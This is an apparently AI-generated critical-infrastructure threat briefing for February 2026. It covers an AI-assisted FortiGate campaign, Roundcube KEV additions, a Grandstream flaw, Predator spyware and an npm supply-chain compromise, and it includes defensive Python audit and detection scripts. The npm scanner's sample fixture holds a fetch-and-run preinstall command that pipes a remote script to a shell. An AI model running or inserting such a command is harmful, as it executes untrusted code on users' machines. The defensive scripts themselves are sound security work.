
AI-Assisted Threat Actor Breaches 600+ FortiGate Devices Globally; CISA Adds Actively Exploited Roundcube Flaws to KEV Catalog

Critical Infrastructure Intelligence Briefing

Reporting Period: February 15–22, 2026
Published: Sunday, February 22, 2026


1. Executive Summary

This week's intelligence highlights a significant escalation in AI-assisted attacks on network infrastructure: a Russian-speaking threat actor compromised over 600 FortiGate devices across 55 countries using commercial generative AI tools. The campaign shows how commercially available AI tooling lowers the skill and time needed to run mass exploitation of network edge devices.

Key Developments:

  • AI-Enabled Attack Campaign: A financially motivated threat actor leveraged commercial AI services to accelerate exploitation of FortiGate firewalls, compromising 600+ devices in five weeks. Amazon and Fortinet have issued coordinated warnings.
  • Active Exploitation of Webmail Infrastructure: CISA added two Roundcube vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, indicating active targeting of email infrastructure—a critical communication backbone for many organizations.
  • VoIP Infrastructure at Risk: A critical vulnerability in Grandstream phone systems (CVE-2026-2329) enables unauthenticated remote code execution with root privileges, potentially exposing voice communications to interception.
  • Mobile Surveillance Threat: New analysis reveals Predator spyware capabilities to evade iOS security indicators while conducting covert surveillance, raising concerns for high-value targets in critical infrastructure leadership.
  • Supply Chain Compromise: A compromised npm package has been distributing the OpenClaw malware to developer machines, highlighting persistent software supply chain risks.

Immediate Actions Required:

  • Organizations using FortiGate devices should immediately audit configurations, review logs for indicators of compromise, and ensure all patches are current
  • Roundcube webmail deployments require immediate patching per CISA guidance
  • Grandstream phone system operators should apply available patches and implement network segmentation

2. Threat Landscape

Nation-State and Advanced Threat Actor Activities

AI-Assisted FortiGate Campaign

The most significant development this week involves a Russian-speaking, financially motivated threat actor who compromised more than 600 FortiGate firewall devices across 55 countries within five weeks. The campaign is notable for its reported use of commercial generative AI services to:

  • Automate vulnerability identification and exploitation
  • Generate custom exploit code and payloads
  • Scale attack operations beyond traditional manual capabilities
  • Evade detection through AI-generated variations in attack patterns

Analysis: This campaign represents a significant inflection point in the threat landscape. The use of commercially available AI tools to accelerate and scale attacks suggests that similar techniques will become increasingly common across threat actor tiers. Critical infrastructure operators should anticipate that AI-assisted attacks will reduce the time between vulnerability disclosure and widespread exploitation.

Sources: The Hacker News, Bleeping Computer

Mobile Surveillance: Predator Spyware Evolution

Security researchers have documented new capabilities in Intellexa's Predator spyware that allow it to hook into iOS SpringBoard to hide microphone and camera activity indicators while secretly streaming feeds to operators. This technique bypasses Apple's privacy indicators designed to alert users when recording is active.

Implications for Critical Infrastructure:

  • Executive leadership and key personnel in critical infrastructure sectors may be targeted for intelligence collection
  • Sensitive operational discussions could be compromised without visible indicators
  • Organizations should review mobile device policies for personnel with access to sensitive infrastructure information

Source: Bleeping Computer

Cybercriminal Developments

Supply Chain Attack: npm Package Compromise

A compromised npm package has been silently installing OpenClaw malware on developer machines. This supply chain attack vector poses significant risks to organizations developing software for critical infrastructure systems.

Risk Assessment:

  • Development environments for ICS/SCADA software could be compromised
  • Malicious code could be introduced into critical infrastructure control systems
  • Organizations should audit npm dependencies and implement software composition analysis

Source: CSO Online

Emerging Attack Vectors

Attack Vector            | Target                             | Severity | Status
-------------------------|------------------------------------|----------|---------------------------
AI-Assisted Exploitation | Network Infrastructure (FortiGate) | CRITICAL | Active Exploitation
Webmail Vulnerabilities  | Roundcube Deployments              | HIGH     | Active Exploitation (KEV)
VoIP RCE                 | Grandstream Phone Systems          | CRITICAL | Patch Available
Supply Chain             | npm Developer Ecosystem            | HIGH     | Active Distribution

3. Sector-Specific Analysis

Energy Sector

Threat Level: ELEVATED

The FortiGate compromise campaign poses direct risks to energy sector organizations that rely on Fortinet products for network security. Energy sector entities should prioritize:

  • Immediate audit of all FortiGate devices for indicators of compromise
  • Review of network segmentation between IT and OT environments
  • Enhanced monitoring of firewall configuration changes
  • Verification that management interfaces are not exposed to the internet

Recommended Action: Energy sector ISACs should coordinate threat intelligence sharing regarding observed FortiGate exploitation attempts within member organizations.

Water & Wastewater Systems

Threat Level: ELEVATED

Water utilities often operate with limited cybersecurity resources and may be particularly vulnerable to the types of attacks observed this week. Key concerns include:

  • Many water utilities use Fortinet products for perimeter security
  • Remote access capabilities for distributed infrastructure may be exposed
  • Limited security monitoring capabilities may delay detection

Recommended Action: WaterISAC members should leverage shared resources for FortiGate configuration audits and consider implementing additional network monitoring at IT/OT boundaries.

Communications & Information Technology

Threat Level: HIGH

Multiple developments this week directly impact the communications sector:

Grandstream VoIP Vulnerability (CVE-2026-2329)

  • Impact: Unauthenticated remote code execution with root privileges
  • Risk: Call interception, network pivot point, surveillance
  • Affected Systems: Grandstream phone systems widely deployed in enterprise environments
  • Mitigation: Apply vendor patches immediately; implement network segmentation for VoIP infrastructure

Roundcube Webmail Exploitation

  • CISA's addition of two Roundcube flaws to the KEV catalog indicates active targeting
  • Email infrastructure compromise can enable further attacks through credential theft and business email compromise
  • Federal civilian agencies must patch within the BOD 22-01 deadlines; other organizations should treat those deadlines as the target for their own remediation

Sources: SecurityWeek, The Hacker News

Transportation Systems

Threat Level: MODERATE

While no transportation-specific incidents were reported this week, the sector should note:

  • FortiGate devices are commonly deployed in transportation network infrastructure
  • Aviation and maritime sectors should audit network security appliances
  • Rail and mass transit operators should verify OT network isolation

Healthcare & Public Health

Threat Level: ELEVATED

Healthcare organizations face compounded risks from this week's developments:

  • FortiGate devices protecting healthcare networks may be compromised
  • Roundcube webmail is used by some healthcare organizations for email
  • VoIP systems in healthcare facilities may be vulnerable to Grandstream flaws
  • Predator spyware capabilities raise concerns for healthcare executive targeting

Recommended Action: Health-ISAC members should prioritize vulnerability scanning and patching across all identified vulnerable systems.

Financial Services

Threat Level: ELEVATED

Financial institutions should be particularly concerned about:

  • The AI-assisted attack methodology, which may be adapted for financial sector targeting
  • Supply chain risks from compromised developer tools
  • VoIP interception risks for sensitive financial communications

4. Vulnerability & Mitigation Updates

Critical Vulnerabilities Requiring Immediate Attention

CISA Known Exploited Vulnerabilities (KEV) Additions

Date Added: February 21, 2026

CVE | Product           | Description                            | Remediation Deadline
----|-------------------|----------------------------------------|---------------------
TBD | Roundcube Webmail | Two actively exploited vulnerabilities | Per CISA BOD 22-01

Action Required: Federal agencies must remediate per CISA timelines. All organizations are strongly encouraged to prioritize patching.

Source: The Hacker News

CVE-2026-2329: Grandstream Phone Systems

  • Severity: CRITICAL
  • Attack Vector: Network (no authentication required)
  • Impact: Remote code execution with root privileges
  • Potential impact: call interception, and use of the compromised device as a pivot into the internal network

Mitigation Steps:

  1. Apply vendor patches immediately
  2. Segment VoIP infrastructure from general network
  3. Implement access controls limiting management interface exposure
  4. Monitor for unusual VoIP traffic patterns
  5. Review device configuration and logs for unexpected changes (new accounts, altered call routing or forwarding) and unusual outbound connections; a root-level compromise will not show up in ordinary call detail records

Source: SecurityWeek

FortiGate Security Recommendations

In response to the AI-assisted compromise campaign, organizations should implement the following measures:

Immediate Actions:

  • Verify all FortiGate devices are running the latest firmware
  • Audit administrative accounts for unauthorized access
  • Review and restrict management interface access
  • Enable and review logging for configuration changes
  • Implement multi-factor authentication for all administrative access
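The first three immediate actions above (firmware, admin accounts, management exposure) can be checked offline against a configuration backup rather than by clicking through each device. The script below is an added example, not code from the briefing or from Fortinet: it parses the config/edit/set/next/end layout of a FortiOS backup and flags admin protocols on a WAN-role interface, administrator accounts outside an expected baseline, and administrators with no trusthost restriction. The sample configuration, interface names and the expected-admin baseline are constructed for the example.

```python
"""Audit a FortiOS configuration backup for common FortiGate hardening gaps.

The configuration below is constructed for this example; it follows the
config/edit/set/next/end block layout of a FortiOS backup and is not from
any real device.
"""
import shlex

SAMPLE_CONFIG = """\
#config-version=FGT60F-7.4.0-FW-build2360-230509:opmode=0:vdom=0
config system interface
    edit "wan1"
        set vdom "root"
        set ip 203.0.113.10 255.255.255.0
        set allowaccess ping https ssh fgfm
        set type physical
        set role wan
        config ipv6
            set ip6-allowaccess ping
        end
    next
    edit "internal"
        set vdom "root"
        set ip 10.10.0.1 255.255.255.0
        set allowaccess ping https ssh
        set type physical
        set role lan
    next
end
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set trusthost1 10.10.0.0 255.255.255.0
    next
    edit "support"
        set accprofile "super_admin"
        set vdom "root"
    next
end
"""

# Protocols that expose device administration (fgfm is FortiManager and is left out).
ADMIN_PROTOCOLS = {"http", "https", "ssh", "telnet", "snmp"}


def parse_fortios(text):
    """Parse the top level of a FortiOS config into {section: {entry: {attr: [values]}}}.

    Nested 'config ... end' blocks inside an entry (e.g. 'config ipv6') are
    skipped, which is enough for the checks below.
    """
    sections, section, entry, nested = {}, None, None, 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tok = shlex.split(line)
        kw = tok[0]
        if kw == "config":
            if section is None:
                section = " ".join(tok[1:])
                sections[section] = {}
            else:
                nested += 1          # entering a block nested inside an entry
        elif kw == "end":
            if nested:
                nested -= 1
            else:
                section = None
        elif nested:
            continue                 # ignore attributes of nested blocks
        elif kw == "edit":
            entry = tok[1]
            sections[section][entry] = {}
        elif kw == "next":
            entry = None
        elif kw == "set" and entry is not None:
            sections[section][entry][tok[1]] = tok[2:]
    return sections


def audit(sections, expected_admins):
    """Return human-readable findings for the three hardening checks."""
    findings = []
    for name, attrs in sections.get("system interface", {}).items():
        if attrs.get("role") == ["wan"]:
            exposed = ADMIN_PROTOCOLS & set(attrs.get("allowaccess", []))
            if exposed:
                findings.append(f"interface {name}: {sorted(exposed)} enabled on a WAN-role interface")
    for name, attrs in sections.get("system admin", {}).items():
        if name not in expected_admins:
            findings.append(f"admin {name}: account not in the expected baseline")
        if not any(attr.startswith("trusthost") for attr in attrs):
            findings.append(f"admin {name}: no trusthost restriction (reachable from any source)")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_fortios(SAMPLE_CONFIG), expected_admins={"admin"}):
        print("FINDING:", finding)
```

Run it against a backup exported from each device (or from FortiManager) and diff the findings over time; a new admin account or a newly added protocol on a WAN interface between two backups is exactly the configuration-change indicator the campaign calls for.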

Detection Indicators:

  • Unexpected configuration changes
  • New administrative accounts
  • Unusual outbound connections from firewall devices
  • Modified firewall rules or policies
  • Disabled logging or security features
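The detection indicators above map directly onto FortiGate event logs once they are shipped to a collector. The script below is an added example, not code from the briefing or from Fortinet: it parses the key=value layout of FortiOS syslog output and raises an alert for an admin login from outside a trusted network, creation of an admin account, a logging setting switched to disable, and any firewall policy change. The log lines are constructed; device names, addresses, cfgtid and logid values are invented, and the trusted-network list is an assumption. The fields relied on are logdesc, action, status, cfgpath, cfgattr, cfgobj, ui and srcip.

```python
"""Run FortiGate compromise indicators over FortiOS event-log lines.

The log lines below are constructed for this example; they follow the
key=value layout of FortiOS syslog output, but the values are invented.
"""
import ipaddress
import re

# Source networks from which administrator logins are expected (assumed).
TRUSTED_ADMIN_NETS = [ipaddress.ip_network("10.10.0.0/24")]

SAMPLE_LOGS = """\
date=2026-02-19 time=03:14:02 devname="fw-edge-1" logid="0100032001" type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" user="admin" ui="https(198.51.100.7)" method="https" srcip=198.51.100.7 dstip=203.0.113.10 action="login" status="success" reason="none" profile="super_admin" msg="Administrator admin logged in successfully from https(198.51.100.7)"
date=2026-02-19 time=03:14:40 devname="fw-edge-1" logid="0100044546" type="event" subtype="system" level="information" vd="root" logdesc="Object configured" user="admin" ui="https(198.51.100.7)" action="Add" cfgtid=1179650 cfgpath="system.admin" cfgobj="support" cfgattr="accprofile[super_admin]vdom[root]" msg="Add system.admin support"
date=2026-02-19 time=03:15:05 devname="fw-edge-1" logid="0100044547" type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="https(198.51.100.7)" action="Edit" cfgtid=1179651 cfgpath="log.syslogd.setting" cfgattr="status[enable->disable]" msg="Edit log.syslogd.setting"
date=2026-02-19 time=03:16:11 devname="fw-edge-1" logid="0100044547" type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="support" ui="ssh(198.51.100.7)" action="Edit" cfgtid=1179652 cfgpath="firewall.policy" cfgobj="12" cfgattr="action[deny->accept]" msg="Edit firewall.policy 12"
date=2026-02-19 time=09:02:33 devname="fw-edge-1" logid="0100032001" type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" user="admin" ui="https(10.10.0.25)" method="https" srcip=10.10.0.25 dstip=10.10.0.1 action="login" status="success" reason="none" profile="super_admin" msg="Administrator admin logged in successfully from https(10.10.0.25)"
"""

# key=value pairs; values are either double-quoted (may contain spaces) or bare.
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_line(line):
    """Split a FortiOS key=value log line into a dict, stripping the quotes."""
    return {k: v[1:-1] if v.startswith('"') else v for k, v in FIELD_RE.findall(line)}


def source_ip(ev):
    """Admin source address: srcip if present, else the address inside ui="https(x.x.x.x)"."""
    if "srcip" in ev:
        return ev["srcip"]
    m = re.search(r"\(([\d.]+)\)", ev.get("ui", ""))
    return m.group(1) if m else None


def evaluate(ev):
    """Return (rule, detail) if the event matches an indicator, else None."""
    action, cfgpath = ev.get("action"), ev.get("cfgpath", "")
    if action == "login" and ev.get("status") == "success":
        ip = source_ip(ev)
        if ip and not any(ipaddress.ip_address(ip) in net for net in TRUSTED_ADMIN_NETS):
            return ("admin_login_untrusted_source", f"{ev.get('user')} from {ip}")
    if action == "Add" and cfgpath == "system.admin":
        return ("new_admin_account", f"{ev.get('cfgobj')} created by {ev.get('user')}")
    if cfgpath.startswith("log.") and "->disable" in ev.get("cfgattr", ""):
        return ("logging_disabled", f"{cfgpath} {ev.get('cfgattr')} by {ev.get('user')}")
    if cfgpath == "firewall.policy" and action in ("Add", "Edit", "Delete"):
        return ("firewall_policy_changed",
                f"policy {ev.get('cfgobj')} {ev.get('cfgattr')} by {ev.get('user')}")
    return None


def detect(log_text):
    """Apply evaluate() to each line and return the alerts in log order."""
    alerts = []
    for line in log_text.splitlines():
        if line.strip():
            hit = evaluate(parse_line(line))
            if hit:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_LOGS):
        print(f"ALERT {rule}: {detail}")
```

The sequence in the sample (untrusted login, new admin, syslog disabled, policy flipped to accept) is the order an intruder would typically work in, and the logging_disabled rule is the one to alert on fastest: after that event the device stops telling you anything, so the collector-side gap itself should also be alarmed.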

AI Security Tool Development

Anthropic has launched Claude Code Security, an AI-powered vulnerability scanning capability. While this represents a positive development for defensive capabilities, organizations should:

  • Evaluate AI-assisted security tools as part of defense-in-depth strategies
  • Maintain human oversight of AI-generated security recommendations
  • Consider how AI tools can accelerate vulnerability identification in critical systems

Source: The Hacker News


5. Resilience & Continuity Planning

Lessons from the FortiGate Campaign

The AI-assisted FortiGate compromise campaign offers several important lessons for critical infrastructure resilience:

Key Takeaways:

  • Speed of Exploitation: 600+ devices compromised in 5 weeks demonstrates the accelerated pace of AI-assisted attacks. Traditional patch cycles may be insufficient.
  • Geographic Scope: 55 countries affected indicates no region is immune; global infrastructure operators must coordinate response.
  • Defense Implications: Organizations must assume that AI-assisted attacks will become the norm and adjust defensive postures accordingly.

Resilience Recommendations:

  1. Reduce Attack Surface: Minimize internet-exposed management interfaces
  2. Implement Zero Trust: Assume network perimeter devices may be compromised
  3. Enhance Monitoring: Deploy behavioral analytics to detect anomalous device behavior
  4. Segment Networks: Ensure compromise of perimeter devices cannot directly impact OT systems
  5. Plan for Rapid Response: Develop playbooks for mass device compromise scenarios

Supply Chain Security Considerations

The npm package compromise highlights ongoing software supply chain risks:

  • Implement software composition analysis (SCA) tools
  • Maintain software bills of materials (SBOMs) for critical systems
  • Establish vendor security assessment programs
  • Consider air-gapped development environments for critical infrastructure software
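A package that "silently installs" something on a developer machine, as in the npm incident in Section 2 above, almost always does so through an npm lifecycle script (preinstall, install or postinstall) that runs the moment the package is installed. The script below is an added example, not code from the briefing or from npm: it scans an installed node_modules tree, including @scoped packages, lists every package that declares one of those hooks, and reports the ones not on a reviewed allowlist. The package tree is built in a temporary directory for the example; the package names, versions, commands and the allowlist are constructed.

```python
"""Find npm packages in node_modules that declare install-time lifecycle scripts.

The package tree is constructed in a temporary directory for this example;
names, versions and commands are invented and not from any real incident.
"""
import json
import os
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Packages whose install scripts have been reviewed and accepted (assumed).
ALLOWLIST = {"native-build-helper"}


def find_install_scripts(node_modules):
    """Return [(name, version, hook, command)] for every lifecycle hook in the
    top level of node_modules, including @scope/name packages."""
    findings = []
    for entry in sorted(os.listdir(node_modules)):
        path = os.path.join(node_modules, entry)
        if entry.startswith("@") and os.path.isdir(path):
            # scoped packages live one level deeper: node_modules/@scope/name
            dirs = [os.path.join(path, d) for d in sorted(os.listdir(path))]
        else:
            dirs = [path]
        for pkg_dir in dirs:
            manifest = os.path.join(pkg_dir, "package.json")
            if not os.path.isfile(manifest):
                continue
            with open(manifest, encoding="utf-8") as fh:
                meta = json.load(fh)
            scripts = meta.get("scripts") or {}
            for hook in LIFECYCLE_HOOKS:
                if hook in scripts:
                    findings.append((meta.get("name", entry), meta.get("version", "?"),
                                     hook, scripts[hook]))
    return findings


def unapproved(findings, allowlist=ALLOWLIST):
    """Findings for packages not on the allowlist; these need review before install."""
    return [f for f in findings if f[0] not in allowlist]


def build_fixture(root):
    """Create a constructed node_modules tree: one clean package, one allowlisted
    native build, and one scoped package with a suspicious preinstall hook."""
    pkgs = {
        "left-pad-ish": {"name": "left-pad-ish", "version": "1.0.0"},
        "native-build-helper": {"name": "native-build-helper", "version": "2.3.1",
                                "scripts": {"install": "node-gyp rebuild"}},
        "@acme/utils": {"name": "@acme/utils", "version": "0.9.4",
                        "scripts": {"preinstall": "curl -s http://203.0.113.5/x.sh | sh",
                                    "test": "node test.js"}},
    }
    nm = os.path.join(root, "node_modules")
    for name, meta in pkgs.items():
        pkg_dir = os.path.join(nm, *name.split("/"))
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(meta, fh)
    return nm


def run_demo():
    """Build the fixture, scan it, and return (all findings, unapproved findings)."""
    with tempfile.TemporaryDirectory() as tmp:
        found = find_install_scripts(build_fixture(tmp))
        return found, unapproved(found)


if __name__ == "__main__":
    _, flagged = run_demo()
    for name, version, hook, cmd in flagged:
        print(f"REVIEW {name}@{version}: {hook} -> {cmd}")
```

The scan only tells you what would have run; the preventive control is to install with `npm ci --ignore-scripts` in CI and on developer machines, then run the build steps of allowlisted packages explicitly, so a newly compromised version cannot execute anything at install time. Note the scan covers the top level of node_modules only; nested node_modules directories inside packages need the same walk applied recursively.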

Cross-Sector Dependencies

This week's threats highlight critical dependencies:

  • Network Security Infrastructure: FortiGate devices protect multiple critical infrastructure sectors; compromise creates cascading risks
  • Communications: VoIP and email vulnerabilities affect all sectors' ability to coordinate
  • Software Development: Supply chain compromises can propagate across all sectors using affected components

6. Regulatory & Policy Developments

CISA Actions

CISA's addition of Roundcube vulnerabilities to the KEV catalog triggers mandatory remediation timelines for federal agencies under Binding Operational Directive (BOD) 22-01. While not mandatory for private sector organizations, critical infrastructure operators are strongly encouraged to:

  • Treat KEV additions as high-priority patching requirements
  • Align internal vulnerability management with CISA timelines
  • Report exploitation attempts through appropriate channels

AI Workforce Development

EC-Council has expanded its AI certification portfolio to address workforce readiness and security concerns. EC-Council cites the following statistics as drivers for the initiative:

  • $5.5 trillion in global AI risk exposure
  • 700,000 U.S. workers requiring AI-related reskilling
  • New certifications include Certified CISO v4 with AI security components

Implication for Critical Infrastructure: Organizations should evaluate AI security training requirements for security personnel, particularly given the emergence of AI-assisted attack methodologies.

Source: The Hacker News

Anticipated Regulatory Developments

Based on current threat trends, critical infrastructure operators should prepare for potential regulatory focus on:

  • AI security requirements and governance frameworks
  • Enhanced network device security standards
  • Supply chain security attestation requirements
  • Incident reporting for AI-assisted attacks

7. Training & Resource Spotlight

New Security Tools and Capabilities

Claude Code Security

Anthropic's new AI-powered vulnerability scanning tool offers:

  • Automated codebase security analysis
  • Vulnerability identification and patch suggestions
  • Integration with development workflows

Critical infrastructure organizations developing custom software should evaluate this and similar tools for security enhancement.

Workforce Development

EC-Council AI Certifications

New certification offerings address the intersection of AI and cybersecurity:

  • AI security fundamentals
  • AI risk management
  • Certified CISO v4 (includes AI security components)

Recommendation: Critical infrastructure organizations should consider incorporating AI security training into professional development programs.

Recommended Training Focus Areas

Based on this week's threat landscape, organizations should prioritize training in:

  • Network device security and hardening
  • AI-assisted attack recognition and response
  • Supply chain security assessment
  • Mobile device security for executives
  • VoIP security and monitoring

8. Looking Ahead: Upcoming Events

NIST Events

Technologies and Use Cases for Smart Standards

  • Date: March 19, 2026
  • Focus: Standards development for AI, blockchain, and IoT technologies
  • Relevance: Critical infrastructure operators should monitor standards development affecting emerging technology deployments

Building the Strategic Supply Chain Network

  • Date: March 9, 2026
  • Focus: Addressing supply chain vulnerabilities exposed by recent disruptions
  • Relevance: Directly applicable to critical infrastructure supply chain resilience

Cybersecurity for IoT Workshop: Future Directions

  • Date: March 31, 2026
  • Focus: Emerging IoT security trends and implications
  • Relevance: IoT security is increasingly critical for operational technology environments

Iris Experts Group Annual Meeting

  • Date: June 25, 2026
  • Focus: Iris recognition technology for government applications
  • Relevance: Physical security and access control for critical infrastructure

Threat Awareness Periods

  • Ongoing: Heightened vigilance for FortiGate exploitation attempts
  • Ongoing: Monitor for Roundcube exploitation in organizational environments
  • Q1 2026: Anticipate continued evolution of AI-assisted attack methodologies

Recommended Preparation Activities

  • Conduct tabletop exercises focused on mass network device compromise scenarios
  • Review and update incident response playbooks for AI-assisted attacks
  • Assess organizational readiness for supply chain compromise events
  • Evaluate mobile device security policies for executive personnel

Contact and Information Sharing

Critical infrastructure owners and operators are encouraged to:

  • Report suspicious activity to CISA: www.cisa.gov/report
  • Share threat intelligence through sector-specific ISACs
  • Participate in public-private partnership initiatives
  • Subscribe to CISA alerts and advisories

This briefing is derived from open-source intelligence and is intended to support critical infrastructure protection efforts. Recipients are encouraged to verify information through official channels and adapt recommendations to their specific operational environments.

Disclaimer

This briefing is generated using AI analysis of public news sources. Always verify critical information through authoritative sources before taking action.